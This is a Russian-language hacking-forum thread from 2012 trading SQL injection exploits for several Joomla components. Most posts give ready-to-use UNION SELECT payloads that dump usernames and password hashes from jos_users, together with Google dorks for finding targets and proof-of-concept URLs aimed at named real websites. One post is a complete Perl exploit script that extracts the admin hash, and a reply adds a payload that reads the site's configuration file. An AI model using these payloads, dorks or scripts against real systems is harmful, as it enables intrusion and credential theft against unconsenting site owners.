ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.09.2012, 23:40
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Joomla "com_ownbiblio" component SQL Injection
Уязвим параметр catid
Эксплyатация:
Код:
Code:
index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat(username,0x3a,password,0x3a,usertype),5,6,7,8,9,0,11,12,13,14,15,16,17+from+jos_users+--+
количество калонок может меняться!
POC:
Сообщение от None
http://www.wisdomtherapy.com/index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat%28user%28%29,version%2 8%29,database%28%29%29,5,6,7,8,9,0,11,12,13,14,15, 16,17+from+jos_users+--+&Itemid=0&year=All&search=&page=2&view=catalogu e
Дорк: "inurl:com_ownbiblio catid"
Уязвимый код:
сomponents/com_ownbiblio/models/ownbiblio.php
[QUOTE="None"]
function getCategoryByID($ID)
{
$query = "
SELECT
* FROM #__ownbiblio_categories WHERE ID =".
$ID
;
$category = $this->_getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate _getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate
|
|
|

19.10.2012, 21:24
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Joomla "com_jomtube" component SQL Injection
Уязвим параметр user_id
Эксплyатация:
Код:
Code:
index.php?view=videos&type=member&user_id=[ID юзера] and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,usertype),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users limit 0,5 -- &option=com_jomtube
user_id - должен быть существующий!
POC:
Сообщение от None
http://www.mbrrealty.com.au/index.php?view=videos&type=member&user_id=63%20and %201=0%20union%20select%201,2,3,4,5,6,7,8,9,0,11,1 2,concat_ws%280x3a,user%28%29,version%28%29,databa se%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27%20--%20&option=com_jomtube
Дорк: "inurl:com_jomtube"
Уязвимый код:
components/com_jomtube/models/video.php
Пару моментов, все приводить не буду:
Сообщение от None
$where
= ' WHERE v.id = ' .
$this->_id
;
$join = ' LEFT JOIN #__users AS u ON u.id = v.user_id';
$select = ' v.*, u.name, u.username';
if ($c->community == 'JomSocial') {
$join.= ' LEFT JOIN #__community_users AS p ON p.userid =
v.user_id
';
$select.= ', p.avatar';
}
$select .= ', c.directory, c.family_id, c.category_name';
$join .= ' JOIN #__jomtube_categories AS c ON c.id = v.category_id';
$query = '
SELECT ' . $select . ' FROM #__jomtube_videos AS v ' . $join . $where
;
[ ... ]
function getVideosincategory() {
$query = 'SELECT v.*, c.directory, u.username, c.category_name, u.id as userid '
. ' FROM #__jomtube_videos AS v '
. ' LEFT JOIN #__users AS u ON
v.user_id = u.id
'
. ' JOIN #__jomtube_categories AS c ON c.id = v.category_id'
. ' WHERE v.category_id = '.$this->_data->category_id
. ' AND v.id != ' .
$this->_id
. ' AND v.published = 1 '
. ' ORDER BY v.date_added DESC'
. ' LIMIT 20'
;
$this->_db->setQuery($query);
return $this->_db->loadObjectList();
P.S:Уязвимость старая и давно есть в паблике, как сегодня убедился до сих пор актуальна.
http://www.exploit-db.com/exploits/14434/
|
|
|

19.10.2012, 21:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
Joomla tag Remote Sql Exploit
dork: inurl:index.php?option=com_tag
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/usr/bin/perl -w
[/COLOR][COLOR="#007700"]print[/COLOR][COLOR="#DD0000"]"\t\t\n\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t \n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t Joomla com_tag Remote Sql Exploit \n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t\n\n"[/COLOR][COLOR="#007700"];
use[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\nExample:[http://wwww.site.com/]: "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]chomp[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]my $target[/COLOR][COLOR="#007700"]=);
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"username"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"password"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"jos_users"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"com_tag&task"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]() or die[/COLOR][COLOR="#DD0000"]"Could not initialize browser\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"index.php?option="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&tag=999999.9' union all select 1,concat(0x3c757365723e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c757365723e3c706173733e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c706173733e)+from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"--+a"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]request[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Request[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~ /(.*?)/){
print[/COLOR][COLOR="#DD0000"]"\nLos Information for site:\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\n
* Admin User : $1"[/COLOR][COLOR="#007700"];
}
if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~/(.*?)/){print[/COLOR][COLOR="#DD0000"]"\n
* Admin Hash : $1\n\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t\t# Exploit finished #\n\n"[/COLOR][COLOR="#007700"];}
else{print[/COLOR][COLOR="#DD0000"]"\n[-] Exploit Failed...\n"[/COLOR][COLOR="#007700"];}
[/COLOR][/COLOR]
|
|
|
|

14.11.2012, 22:24
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Joomla "com_commedia" component SQL Injection
Уязвим параметр id
Эксплyатация:
Код:
Code:
index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+
POC:
Сообщение от None
http://www.radiodan[google]cemusic.com/index.php?option=com_commedia&format=raw&task=down &pid=124%27+and+1=0&id=2238+and+1=0+union+select+c oncat%28username,0x3a,password,0x3a,usertype%29,2+ from+jos_users+where+usertype+like+0x2561646D696E6 973747261746F7225+limit+1,1+--+
Дорк: "inurl:com_commedia id"
Уязвимый код:
components/com_commedia/models/file.php
Сообщение от None
function DownFile($image=false/*может картинка нужна?*/) {
include_once(JPATH_SITE.DS."components".DS."com_co mmedia".DS."classes".DS."functions.php");
$db =& JFactory::getDBO();
$db->setQuery("SELECT * FROM #__commedia_settings");
$commsett = $db->loadAssocList('name');
//кодировка файловой системы
$fnames_encoding = comm_getencoding($commsett['fnames_encoding']['value']);
$db->setQuery("SELECT CONCAT(path,'/',name) as path, name
FROM `#__commedia` as c, `#__commedia_path` as cp
WHERE c.rowid=".
$_REQUEST['id']
." and cp.path_id=".
$_REQUEST['pid']
);
if (!$db->query()) $path = ''; //если не удалось выполнить, значит запретим доступ
else {
$line=$db->loadObject();
if(!$line) $path = ''; //если ничего не найдено
else {
if (strpos($line->path,'ftp://') === 0) $ftphttp = 1; //для фтп пути отдельно
else if (strpos($line->path,'http://') === 0) $ftphttp = 2; //для http пути отдельно
else {
$ftphttp = 0;
$file = JPATH_SITE.DS.str_replace('/',DS,iconv('UTF-8', $fnames_encoding,$line->path));
if ($image=='1') $file = substr($file,0,-4).'.jpg';
else if ($image=='2') $file = substr($file,0,-4).'_thumb.jpg';
}
$name = $line->name;
}
}
P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"
|
|
|

14.11.2012, 22:55
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме: 15756
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Joomla "com_commedia" component SQL Injection
Уязвим параметр
id
Эксплyатация:
Код:
Code:
index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+
POC:
Дорк:
"inurl:com_commedia id"
Уязвимый код:
components/com_commedia/models/file.php
P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"
Если не просто копипастить баги и совать кавычки, а хотя бы 10 секунд посмотреть в код, станет очевидно, что там ещё и чтение файлов.
Как там у хакеров? 0day pRiv8
index.php?option=com_commedia&format=raw&task=down &pid=124&id=2238+and+1=0+union+select+0x2e2f636f6e 66696775726174696f6e2e706870,2--+
|
|
|

14.11.2012, 23:04
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от KolosJey
KolosJey said:
Если не просто копипастить баги и совать кавычки, а хотя бы 10 секунд посмотреть в код, станет очевидно, что там ещё и чтение файлов.
Как там у хакеров? 0day pRiv8
index.php?option=com_commedia&format=raw&task=down &pid=124&id=2238+and+1=0+union+select+0x2e2f636f6e 66696775726174696f6e2e706870,2--+
Моя цель была раскрыть сам уязвимый код, а не копипаст! на счет чтения файлов я тоже видел, но еще пока не проверил...
|
|
|

21.11.2012, 20:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 42706
Репутация:
6
|
|
Joomla "com_conference" SQL Injection
Уязвим параметр ID
Эксплуатация:
Код:
Code:
/index.php?option=com_conference&task=show&id=999999.9 /*!UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536,0x31303235343830303536*/--
|
|
|
|

18.12.2012, 01:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
Сканер joomla сайта
Появился новый проект - c0lips.ru, здесь вы можете проверить свой сайт на наличие уязвимых компонентах, посмотреть советы по устранению уязвимостей, посмотреть уязвимый код компонента и уже исправленный код.
Для актуализации проекта, прошу добавлять свои уязвимости по адресу: тык
|
|
|
|

20.12.2012, 21:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
Joomla All v1.5 Error Based SQL Injection Vulnerability
Joomla Component com_user
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# script home : http://joomla.com
# Dork : inurlption=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
// Description :
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemi d=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemi d=x+(sql injection) [replacing id number by character]
# priv8 youtube link, just people who has the link could view :
http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemi d=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemi d='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemi d='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemi d='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemi d='
# Greets To : ================================================== ============================
# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
# D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
# ... And All Algerian Hax0rs
================================================== ==========================================
# 1337day.com [2012-12-12][/quote]
|
|
|
|

22.12.2012, 12:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 11028
Репутация:
0
|
|
Сообщение от Zed0x
Zed0x said:
Сканер joomla сайта
Появился новый проект -
c0lips.ru
, здесь вы можете проверить свой сайт на наличие уязвимых компонентах, посмотреть советы по устранению уязвимостей, посмотреть уязвимый код компонента и уже исправленный код.
Для актуализации проекта, прошу добавлять свои уязвимости по адресу:
тык
отличный
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|